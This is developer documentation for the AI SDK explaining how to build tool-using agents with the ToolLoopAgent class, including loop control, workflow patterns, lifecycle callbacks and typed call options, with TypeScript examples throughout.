You can access the entire AI SDK documentation in Markdown format at ai-sdk.dev/llms.txt. This can be used to ask any LLM (assuming it has a big enough context window) questions about the AI SDK based on the most up-to-date documentation.
Example Usage
For instance, to prompt an LLM with questions about the AI SDK:
- Copy the documentation contents from ai-sdk.dev/llms.txt
- Use the following prompt format:
Documentation:
{paste documentation here}
---
Based on the above documentation, answer the following:
{your question}
title: Overview description: Learn how to build agents with the AI SDK.
Agents
Agents are large language models (LLMs) that use tools in a loop to accomplish tasks.
These components work together:
- LLMs process input and decide the next action
- Tools extend capabilities beyond text generation (reading files, calling APIs, writing to databases)
- Loop orchestrates execution through:
- Context management - Maintaining conversation history and deciding what the model sees (input) at each step
- Stopping conditions - Determining when the loop (task) is complete
ToolLoopAgent Class
The ToolLoopAgent class handles these three components. Here's an agent that uses multiple tools in a loop to accomplish a task:
import { ToolLoopAgent, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const weatherAgent = new ToolLoopAgent({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location (in Fahrenheit)',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
convertFahrenheitToCelsius: tool({
description: 'Convert temperature from Fahrenheit to Celsius',
inputSchema: z.object({
temperature: z.number().describe('Temperature in Fahrenheit'),
}),
execute: async ({ temperature }) => {
const celsius = Math.round((temperature - 32) * (5 / 9));
return { celsius };
},
}),
},
});
const result = await weatherAgent.generate({
prompt: 'What is the weather in San Francisco in celsius?',
});
console.log(result.text); // agent's final answer
console.log(result.steps); // steps taken by the agent
The agent automatically:
- Calls the weather tool to get the temperature in Fahrenheit
- Calls convertFahrenheitToCelsius to convert it
- Generates a final text response with the result
The ToolLoopAgent handles the loop, context management, and stopping conditions.
Why Use the ToolLoopAgent?
The ToolLoopAgent is the recommended approach for building agents with the AI SDK because it:
- Reduces boilerplate - Manages loops and message arrays
- Improves reusability - Define once, use throughout your application
- Simplifies maintenance - Single place to update agent configuration
For most use cases, start with the ToolLoopAgent. Use core functions (generateText, streamText) when you need explicit control over each step for complex structured workflows.
Structured Workflows
Agents are flexible and powerful, but non-deterministic. When you need reliable, repeatable outcomes with explicit control flow, use core functions with structured workflow patterns combining:
- Conditional statements for explicit branching
- Standard functions for reusable logic
- Error handling for robustness
- Explicit control flow for predictability
Explore workflow patterns to learn more about building structured, reliable systems.
Next Steps
- Building Agents - Guide to creating agents with the ToolLoopAgent
- Workflow Patterns - Structured patterns using core functions for complex workflows
- Loop Control - Execution control with stopWhen and prepareStep
title: Building Agents
description: Complete guide to creating agents with the ToolLoopAgent.
Building Agents
The ToolLoopAgent provides a structured way to encapsulate LLM configuration, tools, and behavior into reusable components. It handles the agent loop for you, allowing the LLM to call tools multiple times in sequence to accomplish complex tasks. Define agents once and use them across your application.
Why Use the ToolLoopAgent Class?
When building AI applications, you often need to:
- Reuse configurations - Same model settings, tools, and prompts across different parts of your application
- Maintain consistency - Ensure the same behavior and capabilities throughout your codebase
- Simplify API routes - Reduce boilerplate in your endpoints
- Type safety - Get full TypeScript support for your agent's tools and outputs
The ToolLoopAgent class provides a single place to define your agent's behavior.
Creating an Agent
Define an agent by instantiating the ToolLoopAgent class with your desired configuration:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const myAgent = new ToolLoopAgent({
model: __MODEL__,
instructions: 'You are a helpful assistant.',
tools: {
// Your tools here
},
});
Configuration Options
The ToolLoopAgent accepts all the same settings as generateText and streamText. Configure:
Model and System Instructions
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
instructions: 'You are an expert software engineer.',
});
Tools
Provide tools that the agent can use to accomplish tasks:
import { ToolLoopAgent, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const codeAgent = new ToolLoopAgent({
model: __MODEL__,
tools: {
runCode: tool({
description: 'Execute Python code',
inputSchema: z.object({
code: z.string(),
}),
execute: async ({ code }) => {
// Execute code and return result
return { output: 'Code executed successfully' };
},
}),
},
});
You can also require approval before a tool executes. Use needsApproval on the
tool itself for the default behavior, or set toolNeedsApproval on the
ToolLoopAgent when approval should be configured per agent:
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
runCode: tool({
description: 'Execute Python code',
inputSchema: z.object({
code: z.string(),
}),
execute: async ({ code }) => ({ output: code }),
}),
},
toolNeedsApproval: {
runCode: true,
},
});
Loop Control
By default, agents run for 20 steps (stopWhen: isStepCount(20)). In each step, the model either generates text or calls a tool. If it generates text, the agent completes. If it calls a tool, the AI SDK executes that tool.
You can configure stopWhen differently to allow more steps. After each tool execution, the agent triggers a new generation where the model can call another tool or generate text:
import { ToolLoopAgent, isStepCount } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
stopWhen: isStepCount(50), // Increase default from 20 to 50.
});
Each step represents one generation (which results in either text or a tool call). The loop continues until:
- A finish reason other than tool-calls is returned, or
- A tool that is invoked does not have an execute function, or
- A tool call needs approval, or
- A stop condition is met
You can combine multiple conditions:
import { ToolLoopAgent, isStepCount } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
stopWhen: [
isStepCount(20), // Maximum 20 steps
yourCustomCondition(), // Custom logic for when to stop
],
});
Learn more about loop control and stop conditions.
Tool Choice
Control how the agent uses tools:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
// your tools here
},
toolChoice: 'required', // Force tool use
// or toolChoice: 'none' to disable tools
// or toolChoice: 'auto' (default) to let the model decide
});
You can also force the use of a specific tool:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
weather: weatherTool,
cityAttractions: attractionsTool,
},
toolChoice: {
type: 'tool',
toolName: 'weather', // Force the weather tool to be used
},
});
Structured Output
Define structured output schemas:
import { ToolLoopAgent, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const analysisAgent = new ToolLoopAgent({
model: __MODEL__,
output: Output.object({
schema: z.object({
sentiment: z.enum(['positive', 'neutral', 'negative']),
summary: z.string(),
keyPoints: z.array(z.string()),
}),
}),
});
const { output } = await analysisAgent.generate({
prompt: 'Analyze customer feedback from the last quarter',
});
Define Agent Behavior with System Instructions
System instructions define your agent's behavior, personality, and constraints. They set the context for all interactions and guide how the agent responds to user queries and uses tools.
Basic System Instructions
Set the agent's role and expertise:
const agent = new ToolLoopAgent({
model: __MODEL__,
instructions:
'You are an expert data analyst. You provide clear insights from complex data.',
});
Detailed Behavioral Instructions
Provide specific guidelines for agent behavior:
const codeReviewAgent = new ToolLoopAgent({
model: __MODEL__,
instructions: `You are a senior software engineer conducting code reviews.
Your approach:
- Focus on security vulnerabilities first
- Identify performance bottlenecks
- Suggest improvements for readability and maintainability
- Be constructive and educational in your feedback
- Always explain why something is an issue and how to fix it`,
});
Constrain Agent Behavior
Set boundaries and ensure consistent behavior:
const customerSupportAgent = new ToolLoopAgent({
model: __MODEL__,
instructions: `You are a customer support specialist for an e-commerce platform.
Rules:
- Never make promises about refunds without checking the policy
- Always be empathetic and professional
- If you don't know something, say so and offer to escalate
- Keep responses concise and actionable
- Never share internal company information`,
tools: {
checkOrderStatus,
lookupPolicy,
createTicket,
},
});
Tool Usage Instructions
Guide how the agent should use available tools:
const researchAgent = new ToolLoopAgent({
model: __MODEL__,
instructions: `You are a research assistant with access to search and document tools.
When researching:
1. Always start with a broad search to understand the topic
2. Use document analysis for detailed information
3. Cross-reference multiple sources before drawing conclusions
4. Cite your sources when presenting information
5. If information conflicts, present both viewpoints`,
tools: {
webSearch,
analyzeDocument,
extractQuotes,
},
});
Format and Style Instructions
Control the output format and communication style:
const technicalWriterAgent = new ToolLoopAgent({
model: __MODEL__,
instructions: `You are a technical documentation writer.
Writing style:
- Use clear, simple language
- Avoid jargon unless necessary
- Structure information with headers and bullet points
- Include code examples where relevant
- Write in second person ("you" instead of "the user")
Always format responses in Markdown.`,
});
Using an Agent
Once defined, you can use your agent in three ways:
Generate Text
Use generate() for one-time text generation:
const result = await myAgent.generate({
prompt: 'What is the weather like?',
});
console.log(result.text);
Stream Text
Use stream() for streaming responses:
const result = await myAgent.stream({
prompt: 'Tell me a story',
});
for await (const chunk of result.textStream) {
console.log(chunk);
}
Respond to UI Messages
Use createAgentUIStreamResponse() to create API responses for client applications:
// In your API route (e.g., app/api/chat/route.ts)
import { createAgentUIStreamResponse } from 'ai';
export async function POST(request: Request) {
const { messages } = await request.json();
return createAgentUIStreamResponse({
agent: myAgent,
uiMessages: messages,
});
}
Lifecycle Callbacks
Agents provide lifecycle callbacks that let you hook into different phases of the agent execution. These are useful for logging, observability, debugging, and custom telemetry.
const result = await myAgent.generate({
prompt: 'Research and summarize the latest AI trends',
experimental_onStart({ model, functionId }) {
console.log('Agent started', { model: model.modelId, functionId });
},
experimental_onStepStart({ stepNumber, model }) {
console.log(`Step ${stepNumber} starting`, { model: model.modelId });
},
experimental_onToolExecutionStart({ toolCall }) {
console.log(`Tool call starting: ${toolCall.toolName}`);
},
experimental_onToolExecutionEnd({ toolCall, durationMs, success }) {
console.log(`Tool call finished: ${toolCall.toolName} (${durationMs}ms)`, {
success,
});
},
onStepFinish({ stepNumber, usage, finishReason, toolCalls }) {
console.log(`Step ${stepNumber} completed:`, {
inputTokens: usage.inputTokens,
outputTokens: usage.outputTokens,
finishReason,
toolsUsed: toolCalls?.map(tc => tc.toolName),
});
},
onFinish({ totalUsage, steps }) {
console.log('Agent finished:', {
totalSteps: steps.length,
totalTokens: totalUsage.totalTokens,
});
},
});
The available lifecycle callbacks are:
- experimental_onStart: Called once when the agent operation begins, before any LLM calls. Receives model info, prompt, settings, and runtimeContext.
- experimental_onStepStart: Called before each step (LLM call). Receives the step number, model, messages being sent, tools, and prior steps.
- experimental_onToolExecutionStart: Called right before a tool's execute function runs. Receives the tool call object with tool name, call ID, and input.
- experimental_onToolExecutionEnd: Called right after a tool's execute function completes or errors. Receives the tool call, durationMs, and a success discriminator (output when successful, error when failed).
- onStepFinish: Called after each step finishes. Receives step results including usage, finish reason, and tool calls.
- onFinish: Called when all steps are finished and the response is complete. Receives all step results, total usage, and runtimeContext.
Constructor vs. Method Callbacks
All lifecycle callbacks can be defined in the constructor for agent-wide tracking, in the generate()/stream() call for per-call tracking, or both. When both are provided, both are called (constructor first, then the method callback):
const agent = new ToolLoopAgent({
model: __MODEL__,
onStepFinish: async ({ stepNumber, usage }) => {
// Agent-wide logging
console.log(`Agent step ${stepNumber}:`, usage.totalTokens);
},
});
// Method-level callback runs after constructor callback
const result = await agent.generate({
prompt: 'Hello',
onStepFinish: async ({ stepNumber, usage }) => {
// Per-call tracking (e.g., for billing)
await trackUsage(stepNumber, usage);
},
});
End-to-end Type Safety
You can infer types for your agent's UIMessages:
import { ToolLoopAgent, InferAgentUIMessage } from 'ai';
const myAgent = new ToolLoopAgent({
// ... configuration
});
// Infer the UIMessage type for UI components or persistence
export type MyAgentUIMessage = InferAgentUIMessage<typeof myAgent>;
Use this type in your client components with useChat:
'use client';
import { useChat } from '@ai-sdk/react';
import type { MyAgentUIMessage } from '@/agent/my-agent';
export function Chat() {
const { messages } = useChat<MyAgentUIMessage>();
// Full type safety for your messages and tools
}
Next Steps
Now that you understand building agents, you can:
- Explore workflow patterns for structured patterns using core functions
- Learn about loop control for advanced execution control
- See manual loop examples for custom workflow implementations
title: Workflow Patterns
description: Learn workflow patterns for building reliable agents with the AI SDK.
Workflow Patterns
Combine the building blocks from the overview with these patterns to add structure and reliability to your agents:
- Sequential Processing - Steps executed in order
- Parallel Processing - Independent tasks run simultaneously
- Evaluation/Feedback Loops - Results checked and improved iteratively
- Orchestration - Coordinating multiple components
- Routing - Directing work based on context
Choose Your Approach
Consider these key factors:
- Flexibility vs Control - How much freedom does the LLM need vs how tightly you must constrain its actions?
- Error Tolerance - What are the consequences of mistakes in your use case?
- Cost Considerations - More complex systems typically mean more LLM calls and higher costs
- Maintenance - Simpler architectures are easier to debug and modify
Start with the simplest approach that meets your needs. Add complexity only when required by:
- Breaking down tasks into clear steps
- Adding tools for specific capabilities
- Implementing feedback loops for quality control
- Introducing multiple agents for complex workflows
Let's look at examples of these patterns in action.
Patterns with Examples
These patterns, adapted from Anthropic's guide on building effective agents, serve as building blocks you can combine to create comprehensive workflows. Each pattern addresses specific aspects of task execution. Combine them thoughtfully to build reliable solutions for complex problems.
Sequential Processing (Chains)
The simplest workflow pattern executes steps in a predefined order. Each step's output becomes input for the next step, creating a clear chain of operations. Use this pattern for tasks with well-defined sequences, like content generation pipelines or data transformation processes.
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
async function generateMarketingCopy(input: string) {
const model = __MODEL__;
// First step: Generate marketing copy
const { text: copy } = await generateText({
model,
prompt: `Write persuasive marketing copy for: ${input}. Focus on benefits and emotional appeal.`,
});
// Perform quality check on copy
const { output: qualityMetrics } = await generateText({
model,
output: Output.object({
schema: z.object({
hasCallToAction: z.boolean(),
emotionalAppeal: z.number().min(1).max(10),
clarity: z.number().min(1).max(10),
}),
}),
prompt: `Evaluate this marketing copy for:
1. Presence of call to action (true/false)
2. Emotional appeal (1-10)
3. Clarity (1-10)
Copy to evaluate: ${copy}`,
});
// If quality check fails, regenerate with more specific instructions
if (
!qualityMetrics.hasCallToAction ||
qualityMetrics.emotionalAppeal < 7 ||
qualityMetrics.clarity < 7
) {
const { text: improvedCopy } = await generateText({
model,
prompt: `Rewrite this marketing copy with:
${!qualityMetrics.hasCallToAction ? '- A clear call to action' : ''}
${qualityMetrics.emotionalAppeal < 7 ? '- Stronger emotional appeal' : ''}
${qualityMetrics.clarity < 7 ? '- Improved clarity and directness' : ''}
Original copy: ${copy}`,
});
return { copy: improvedCopy, qualityMetrics };
}
return { copy, qualityMetrics };
}
Routing
This pattern lets the model decide which path to take through a workflow based on context and intermediate results. The model acts as an intelligent router, directing the flow of execution between different branches of your workflow. Use this when handling varied inputs that require different processing approaches. In the example below, the first LLM call's results determine the second call's model size and system prompt.
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
async function handleCustomerQuery(query: string) {
const model = __MODEL__;
// First step: Classify the query type
const { output: classification } = await generateText({
model,
output: Output.object({
schema: z.object({
reasoning: z.string(),
type: z.enum(['general', 'refund', 'technical']),
complexity: z.enum(['simple', 'complex']),
}),
}),
prompt: `Classify this customer query:
${query}
Determine:
1. Query type (general, refund, or technical)
2. Complexity (simple or complex)
3. Brief reasoning for classification`,
});
// Route based on classification
// Set model and system prompt based on query type and complexity
const { text: response } = await generateText({
model:
classification.complexity === 'simple'
? 'openai/gpt-4o-mini'
: 'openai/o4-mini',
system: {
general:
'You are an expert customer service agent handling general inquiries.',
refund:
'You are a customer service agent specializing in refund requests. Follow company policy and collect necessary information.',
technical:
'You are a technical support specialist with deep product knowledge. Focus on clear step-by-step troubleshooting.',
}[classification.type],
prompt: query,
});
return { response, classification };
}
Parallel Processing
Break down tasks into independent subtasks that execute simultaneously. This pattern uses parallel execution to improve efficiency while maintaining the benefits of structured workflows. For example, analyze multiple documents or process different aspects of a single input concurrently (like code review).
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
// Example: Parallel code review with multiple specialized reviewers
async function parallelCodeReview(code: string) {
const model = __MODEL__;
// Run parallel reviews
const [securityReview, performanceReview, maintainabilityReview] =
await Promise.all([
generateText({
model,
system:
'You are an expert in code security. Focus on identifying security vulnerabilities, injection risks, and authentication issues.',
output: Output.object({
schema: z.object({
vulnerabilities: z.array(z.string()),
riskLevel: z.enum(['low', 'medium', 'high']),
suggestions: z.array(z.string()),
}),
}),
prompt: `Review this code:
${code}`,
}),
generateText({
model,
system:
'You are an expert in code performance. Focus on identifying performance bottlenecks, memory leaks, and optimization opportunities.',
output: Output.object({
schema: z.object({
issues: z.array(z.string()),
impact: z.enum(['low', 'medium', 'high']),
optimizations: z.array(z.string()),
}),
}),
prompt: `Review this code:
${code}`,
}),
generateText({
model,
system:
'You are an expert in code quality. Focus on code structure, readability, and adherence to best practices.',
output: Output.object({
schema: z.object({
concerns: z.array(z.string()),
qualityScore: z.number().min(1).max(10),
recommendations: z.array(z.string()),
}),
}),
prompt: `Review this code:
${code}`,
}),
]);
const reviews = [
{ ...securityReview.output, type: 'security' },
{ ...performanceReview.output, type: 'performance' },
{ ...maintainabilityReview.output, type: 'maintainability' },
];
// Aggregate results using another model instance
const { text: summary } = await generateText({
model,
system: 'You are a technical lead summarizing multiple code reviews.',
prompt: `Synthesize these code review results into a concise summary with key actions:
${JSON.stringify(reviews, null, 2)}`,
});
return { reviews, summary };
}
Orchestrator-Worker
A primary model (orchestrator) coordinates the execution of specialized workers. Each worker optimizes for a specific subtask, while the orchestrator maintains overall context and ensures coherent results. This pattern excels at complex tasks requiring different types of expertise or processing.
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
async function implementFeature(featureRequest: string) {
// Orchestrator: Plan the implementation
const { output: implementationPlan } = await generateText({
model: __MODEL__,
output: Output.object({
schema: z.object({
files: z.array(
z.object({
purpose: z.string(),
filePath: z.string(),
changeType: z.enum(['create', 'modify', 'delete']),
}),
),
estimatedComplexity: z.enum(['low', 'medium', 'high']),
}),
}),
system:
'You are a senior software architect planning feature implementations.',
prompt: `Analyze this feature request and create an implementation plan:
${featureRequest}`,
});
// Workers: Execute the planned changes
const fileChanges = await Promise.all(
implementationPlan.files.map(async file => {
// Each worker is specialized for the type of change
const workerSystemPrompt = {
create:
'You are an expert at implementing new files following best practices and project patterns.',
modify:
'You are an expert at modifying existing code while maintaining consistency and avoiding regressions.',
delete:
'You are an expert at safely removing code while ensuring no breaking changes.',
}[file.changeType];
const { output: change } = await generateText({
model: __MODEL__,
output: Output.object({
schema: z.object({
explanation: z.string(),
code: z.string(),
}),
}),
system: workerSystemPrompt,
prompt: `Implement the changes for ${file.filePath} to support:
${file.purpose}
Consider the overall feature context:
${featureRequest}`,
});
return {
file,
implementation: change,
};
}),
);
return {
plan: implementationPlan,
changes: fileChanges,
};
}
Evaluator-Optimizer
Add quality control to workflows with dedicated evaluation steps that assess intermediate results. Based on the evaluation, the workflow proceeds, retries with adjusted parameters, or takes corrective action. This creates robust workflows capable of self-improvement and error recovery.
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
async function translateWithFeedback(text: string, targetLanguage: string) {
let currentTranslation = '';
let iterations = 0;
const MAX_ITERATIONS = 3;
// Initial translation
const { text: translation } = await generateText({
model: __MODEL__,
system: 'You are an expert literary translator.',
prompt: `Translate this text to ${targetLanguage}, preserving tone and cultural nuances:
${text}`,
});
currentTranslation = translation;
// Evaluation-optimization loop
while (iterations < MAX_ITERATIONS) {
// Evaluate current translation
const { output: evaluation } = await generateText({
model: __MODEL__,
output: Output.object({
schema: z.object({
qualityScore: z.number().min(1).max(10),
preservesTone: z.boolean(),
preservesNuance: z.boolean(),
culturallyAccurate: z.boolean(),
specificIssues: z.array(z.string()),
improvementSuggestions: z.array(z.string()),
}),
}),
system: 'You are an expert in evaluating literary translations.',
prompt: `Evaluate this translation:
Original: ${text}
Translation: ${currentTranslation}
Consider:
1. Overall quality
2. Preservation of tone
3. Preservation of nuance
4. Cultural accuracy`,
});
// Check if quality meets threshold
if (
evaluation.qualityScore >= 8 &&
evaluation.preservesTone &&
evaluation.preservesNuance &&
evaluation.culturallyAccurate
) {
break;
}
// Generate improved translation based on feedback
const { text: improvedTranslation } = await generateText({
model: __MODEL__,
system: 'You are an expert literary translator.',
prompt: `Improve this translation based on the following feedback:
${evaluation.specificIssues.join('\n')}
${evaluation.improvementSuggestions.join('\n')}
Original: ${text}
Current Translation: ${currentTranslation}`,
});
currentTranslation = improvedTranslation;
iterations++;
}
return {
finalTranslation: currentTranslation,
iterationsRequired: iterations,
};
}
title: Loop Control
description: Control agent execution with built-in loop management using stopWhen and prepareStep.
Loop Control
You can control both the execution flow and the settings at each step of the agent loop. The loop continues until:
- A finish reason other than tool-calls is returned, or
- A tool that is invoked does not have an execute function, or
- A tool call needs approval, or
- A stop condition is met
The AI SDK provides built-in loop control through two parameters: stopWhen for defining stopping conditions and prepareStep for modifying settings (model, tools, messages, and more) between steps.
Stop Conditions
The stopWhen parameter controls whether execution stops after a step that contains tool results. By default, agents stop after 20 steps using isStepCount(20). This default is a safety measure to prevent runaway loops that could result in excessive API calls and costs.
When you provide stopWhen, the agent continues executing after tool calls until a stopping condition is met. When the condition is an array, execution stops when any of the conditions are met.
Use Built-in Conditions
The AI SDK provides several built-in stopping conditions:
- isStepCount(count): stops after a specified number of steps
- hasToolCall(...toolNames): stops when any of the specified tools is called
- isLoopFinished(): never triggers, letting the loop run until the agent is naturally finished
Run Up to a Maximum Number of Steps
import { ToolLoopAgent, isStepCount } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
// your tools
},
stopWhen: isStepCount(50), // Increasing the default of 20 to 50.
});
const result = await agent.generate({
prompt: 'Analyze this dataset and create a summary report',
});
Run Until Finished
If you want the agent to run until the model naturally stops making tool calls, use isLoopFinished(). This removes the default step limit:
import { ToolLoopAgent, isLoopFinished } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
// your tools
},
stopWhen: isLoopFinished(), // No maximum step limit.
});
const result = await agent.generate({
prompt: 'Analyze this dataset and create a summary report',
});
Combine Multiple Conditions
Combine multiple stopping conditions. The loop stops when it meets any condition:
import { ToolLoopAgent, isStepCount, hasToolCall } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
// your tools
},
stopWhen: [
isStepCount(20), // Maximum 20 steps
hasToolCall('someTool', 'done'), // Stop after calling either tool
],
});
const result = await agent.generate({
prompt: 'Research and analyze the topic',
});
Create Custom Conditions
Build custom stopping conditions for specific requirements:
import { ToolLoopAgent, StopCondition, ToolSet } from 'ai';
__PROVIDER_IMPORT__;
const tools = {
// your tools
} satisfies ToolSet;
const hasAnswer: StopCondition<typeof tools> = ({ steps }) => {
// Stop when the model generates text containing "ANSWER:"
return steps.some(step => step.text?.includes('ANSWER:'));
};
const agent = new ToolLoopAgent({
model: __MODEL__,
tools,
stopWhen: hasAnswer,
});
const result = await agent.generate({
prompt: 'Find the answer and respond with "ANSWER: [your answer]"',
});
Custom conditions receive step information across all steps:
const budgetExceeded: StopCondition<typeof tools> = ({ steps }) => {
const totalUsage = steps.reduce(
(acc, step) => ({
inputTokens: acc.inputTokens + (step.usage?.inputTokens ?? 0),
outputTokens: acc.outputTokens + (step.usage?.outputTokens ?? 0),
}),
{ inputTokens: 0, outputTokens: 0 },
);
const costEstimate =
(totalUsage.inputTokens * 0.01 + totalUsage.outputTokens * 0.03) / 1000;
return costEstimate > 0.5; // Stop if cost exceeds $0.50
};
Prepare Step
The prepareStep callback runs before each step in the loop and defaults to the initial settings if you don't return any changes. Use it to modify settings, manage context, or implement dynamic behavior based on execution history.
Dynamic Model Selection
Switch models based on step requirements:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: 'openai/gpt-4o-mini', // Default model
tools: {
// your tools
},
prepareStep: async ({ stepNumber, messages }) => {
// Use a stronger model for complex reasoning after initial steps
if (stepNumber > 2 && messages.length > 10) {
return {
model: __MODEL__,
};
}
// Continue with default settings
return {};
},
});
const result = await agent.generate({
prompt: '...',
});
Context Management
Manage growing conversation history in long-running loops:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
// your tools
},
prepareStep: async ({ messages }) => {
// Keep only recent messages to stay within context limits
if (messages.length > 20) {
return {
messages: [
messages[0], // Keep system instructions
...messages.slice(-10), // Keep last 10 messages
],
};
}
return {};
},
});
const result = await agent.generate({
prompt: '...',
});
Tool Selection
Control which tools are available at each step:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
search: searchTool,
analyze: analyzeTool,
summarize: summarizeTool,
},
prepareStep: async ({ stepNumber, steps }) => {
// Search phase (steps 0-2)
if (stepNumber <= 2) {
return {
activeTools: ['search'],
toolChoice: 'required',
};
}
// Analysis phase (steps 3-5)
if (stepNumber <= 5) {
return {
activeTools: ['analyze'],
};
}
// Summary phase (step 6+)
return {
activeTools: ['summarize'],
toolChoice: 'required',
};
},
});
const result = await agent.generate({
prompt: '...',
});
You can also force a specific tool to be used:
prepareStep: async ({ stepNumber }) => {
if (stepNumber === 0) {
// Force the search tool to be used first
return {
toolChoice: { type: 'tool', toolName: 'search' },
};
}
if (stepNumber === 5) {
// Force the summarize tool after analysis
return {
toolChoice: { type: 'tool', toolName: 'summarize' },
};
}
return {};
};
Message Modification
Transform messages before sending them to the model:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
// your tools
},
prepareStep: async ({ messages, stepNumber }) => {
// Summarize tool results to reduce token usage
const processedMessages = messages.map(msg => {
if (msg.role === 'tool' && msg.content.length > 1000) {
return {
...msg,
content: summarizeToolResult(msg.content),
};
}
return msg;
});
return { messages: processedMessages };
},
});
const result = await agent.generate({
prompt: '...',
});
Access Step Information
Both stopWhen and prepareStep receive detailed information about the current execution:
prepareStep: async ({
model, // Current model configuration
stepNumber, // Current step number (0-indexed)
steps, // All previous steps with their results
messages, // Messages to be sent to the model
}) => {
// Access previous tool calls and results
const previousToolCalls = steps.flatMap(step => step.toolCalls);
const previousResults = steps.flatMap(step => step.toolResults);
// Make decisions based on execution history
if (previousToolCalls.some(call => call.toolName === 'dataAnalysis')) {
return {
toolChoice: { type: 'tool', toolName: 'reportGenerator' },
};
}
return {};
},
Forced Tool Calling
You can force the agent to always use tools by combining toolChoice: 'required' with a done tool that has no execute function. This pattern ensures the agent uses tools for every step and stops only when it explicitly signals completion.
import { ToolLoopAgent, tool } from 'ai';
import { z } from 'zod';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
search: searchTool,
analyze: analyzeTool,
done: tool({
description: 'Signal that you have finished your work',
inputSchema: z.object({
answer: z.string().describe('The final answer'),
}),
// No execute function - stops the agent when called
}),
},
toolChoice: 'required', // Force tool calls at every step
});
const result = await agent.generate({
prompt: 'Research and analyze this topic, then provide your answer.',
});
// extract answer from done tool call
const toolCall = result.staticToolCalls[0]; // tool call from final step
if (toolCall?.toolName === 'done') {
console.log(toolCall.input.answer);
}
Key aspects of this pattern:
- toolChoice: 'required': Forces the model to call a tool at every step instead of generating text directly. This ensures the agent follows a structured workflow.
- done tool without execute: A tool that has no execute function acts as a termination signal. When the agent calls this tool, the loop stops because there's no function to execute.
- Accessing results: The final answer is available in result.staticToolCalls, which contains tool calls that weren't executed.
This pattern is useful when you want the agent to always use specific tools for operations (like code execution or data retrieval) rather than attempting to answer directly.
Manual Loop Control
For scenarios requiring complete control over the agent loop, you can use AI SDK Core functions (generateText and streamText) to implement your own loop management instead of using stopWhen and prepareStep. This approach provides maximum flexibility for complex workflows.
Implementing a Manual Loop
Build your own agent loop when you need full control over execution:
import { generateText, ModelMessage } from 'ai';
__PROVIDER_IMPORT__;
const messages: ModelMessage[] = [{ role: 'user', content: '...' }];
let step = 0;
const maxSteps = 10;
while (step < maxSteps) {
const result = await generateText({
model: __MODEL__,
messages,
tools: {
// your tools here
},
});
messages.push(...result.response.messages);
if (result.text) {
break; // Stop when model generates text
}
step++;
}
This manual approach gives you complete control over:
- Message history management
- Step-by-step decision making
- Custom stopping conditions
- Dynamic tool and model selection
- Error handling and recovery
Learn more about manual agent loops in the cookbook.
title: Configuring Call Options
description: Pass type-safe runtime inputs to dynamically configure agent behavior.
Configuring Call Options
Call options allow you to pass type-safe structured inputs to your agent. Use them to dynamically modify any agent setting based on the specific request.
Why Use Call Options?
When you need agent behavior to change based on runtime inputs:
- Add dynamic context - Inject retrieved documents, user preferences, or session data into prompts
- Select models dynamically - Choose faster or more capable models based on request complexity
- Configure tools per request - Pass user location to search tools or adjust tool behavior
- Customize provider options - Set reasoning effort, temperature, or other provider-specific settings
Without call options, you'd need to create multiple agents or handle configuration logic outside the agent.
How It Works
Define call options in three steps:
1. Define the schema - Specify what inputs you accept using callOptionsSchema
2. Configure with prepareCall - Use those inputs to modify agent settings
3. Pass options at runtime - Provide the options when calling generate() or stream()
Basic Example
Add user context to your agent's prompt at runtime:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const supportAgent = new ToolLoopAgent({
model: __MODEL__,
callOptionsSchema: z.object({
userId: z.string(),
accountType: z.enum(['free', 'pro', 'enterprise']),
}),
instructions: 'You are a helpful customer support agent.',
prepareCall: ({ options, ...settings }) => ({
...settings,
instructions:
settings.instructions +
`\nUser context:
- Account type: ${options.accountType}
- User ID: ${options.userId}
Adjust your response based on the user's account level.`,
}),
});
// Call the agent with specific user context
const result = await supportAgent.generate({
prompt: 'How do I upgrade my account?',
options: {
userId: 'user_123',
accountType: 'free',
},
});
The options parameter is now required and type-checked. If you don't provide it or pass incorrect types, TypeScript will error.
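For instance, with the supportAgent defined above, both of these calls would fail type-checking (hypothetical illustrations):
// @ts-expect-error: options is required once callOptionsSchema is set
await supportAgent.generate({ prompt: 'How do I upgrade my account?' });
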